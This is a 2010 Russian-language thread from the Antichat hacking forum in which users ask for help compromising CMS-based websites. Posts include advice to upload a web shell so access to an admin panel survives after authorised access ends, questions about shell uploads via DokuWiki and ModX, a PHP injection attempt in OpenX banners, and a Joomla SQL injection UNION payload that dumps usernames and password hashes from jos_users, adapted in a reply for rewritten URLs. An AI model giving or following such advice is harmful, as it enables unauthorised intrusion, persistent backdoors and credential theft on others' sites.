Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

21.01.2010, 20:30
|
|
Новичок
Регистрация: 05.04.2009
Сообщений: 1
Провел на форуме: 4712
Репутация:
0
|
|
Привет всем. у меня вопрос качательно сайта стоящего на дле восьмой версии. Короче у меня сейчас еасть доступ к его админ панели и к FTP но это временно, на пару дней примерно еще, вопросто стоит в том, что можно ли чего сделать, чтобы в будущем, иметь хотяб доступ к админке....ну может воткнуть скрипт какой или еще чего?! спасибо заранее за помощь.
|
|
|

22.01.2010, 12:51
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме: 1180165
Репутация:
11
|
|
Залей шелл.
Какой тип шифрование в пхпбб3, TBDev v.3.0, дле 8.2, phpfusion.Спасибо.
Последний раз редактировалось wkar; 22.01.2010 в 17:50..
|
|
|

31.01.2010, 20:33
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме: 2805813
Репутация:
1396
|
|
//сцк,снова 2 символа
про хеши - читай:
http://forum.antichat.ru/thread155032.html
|
|
|

19.02.2010, 21:51
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме: 598447
Репутация:
123
|
|
Поимел шел на серваке, установлена CMS ModX
Где там можно редактировать тэмплэйт шелом? Через админку не интересует.
Спасибо!
|
|
|

23.02.2010, 01:00
|
|
Новичок
Регистрация: 18.02.2010
Сообщений: 5
Провел на форуме: 7718
Репутация:
0
|
|
Всем привет, есть народ который с Openx встречался?
тестирую опенх 2.8.0 на локалхосте - http://forum.antichat.ru/thread150144.html
вставлаю в баннер код типа <?copy('http://localhost/1.txt', 'x.php');?>test (премисии есть)
просматриваю баннер. В броузаке вижу "тест", но х.php отсутствует(GET в access.log тоже нема). Мысли по этому поводу?
|
|
|

25.02.2010, 00:24
|
|
Новичок
Регистрация: 14.02.2010
Сообщений: 1
Провел на форуме: 10749
Репутация:
0
|
|
Есть сайт с движком HYIP Manager Script подскажите как использовать forwarding для forgot_password. Или как составитить правильный запрос для авторизации без проверки вот я как делаю но не получается
$q = 'select * from hm2_users where id = 1' $row["username"];
|
|
|

18.04.2010, 16:54
|
|
Новичок
Регистрация: 27.12.2009
Сообщений: 8
Провел на форуме: 9139
Репутация:
0
|
|
Есть ли какой-нибудь способ заливки шелла через DokuWiki?
|
|
|

22.04.2010, 11:46
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме: 217423
Репутация:
32
|
|
День добрый, есть сайт на движке Joomla RE 1.0.8.1 Есть на него что-нибудь? про плагины ничего пока не знаю.
|
|
|

08.05.2010, 22:44
|
|
Познающий
Регистрация: 24.08.2009
Сообщений: 67
Провел на форуме: 137206
Репутация:
10
|
|
у джумлы адрес обычно выглядит таким:
index.php?option=com_module&vulnerable_id=178&Blah id=91356
и vulnerable_id - подвержен sql инъекции
как обычно:
-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(us ername,0x3a,password,0x3a,usertype,0x3c62723e),6,. ...N+from+jos_users--
столкнулся с таким видом:
/component/option,com_module/vulnerable_id,178/Blahid,91356/
какой тогда вид скуль запроса должен быть?
|
|
|

10.05.2010, 18:24
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме: 217423
Репутация:
32
|
|
Сообщение от iSlava
у джумлы адрес обычно выглядит таким:
index.php?option=com_module&vulnerable_id=178&Blah id=91356
и vulnerable_id - подвержен sql инъекции
как обычно:
-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(us ername,0x3a,password,0x3a,usertype,0x3c62723e),6,. ...N+from+jos_users--
столкнулся с таким видом:
/component/option,com_module/vulnerable_id,178/Blahid,91356/
какой тогда вид скуль запроса должен быть?
Кажется тут заюзан модуль apache: mod_rewrite. Исходя из написанного тобой выше может иметь место следующий запрос:
/component/option,com_module/vulnerable_id,-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(us ername,0x3a,password,0x3a,usertype,0x3c62723e),6,. ...N+from+jos_users--/Blahid,91356/
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|